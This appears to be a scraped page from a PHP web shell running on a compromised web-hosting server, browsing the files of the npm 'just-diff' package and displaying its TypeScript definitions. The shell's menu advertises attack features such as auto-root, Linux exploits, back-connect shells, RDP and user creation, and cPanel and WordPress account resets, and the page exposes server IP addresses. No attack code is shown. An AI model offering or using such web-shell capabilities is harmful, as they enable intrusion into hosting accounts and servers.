Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.147.63.2
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
alt-nodejs16 /
root /
usr /
lib /
node_modules /
npm /
node_modules.bundled /
just-diff /
[ HOME SHELL ]
Name
Size
Permission
Action
LICENSE
1.05
KB
-rw-r--r--
index.d.ts
668
B
-rw-r--r--
index.js
3.85
KB
-rw-r--r--
index.mjs
3.81
KB
-rw-r--r--
index.tests.ts
1.26
KB
-rw-r--r--
package.json
767
B
-rw-r--r--
rollup.config.js
120
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.d.ts
// Definitions by: Cameron Hunter <https://github.com/cameronhunter> // Modified by: Angus Croll <https://github.com/angus-c> type Operation = "add" | "replace" | "remove"; type JSONPatchPathConverter<OUTPUT> = ( arrayPath: Array<string | number> ) => OUTPUT; export function diff( a: object | Array<any>, b: object | Array<any>, ): Array<{ op: Operation; path: Array<string | number>; value: any }>; export function diff<PATH>( a: object | Array<any>, b: object | Array<any>, jsonPatchPathConverter: JSONPatchPathConverter<PATH> ): Array<{ op: Operation; path: PATH; value: any }>; export const jsonPatchPathConverter: JSONPatchPathConverter<string>;
Close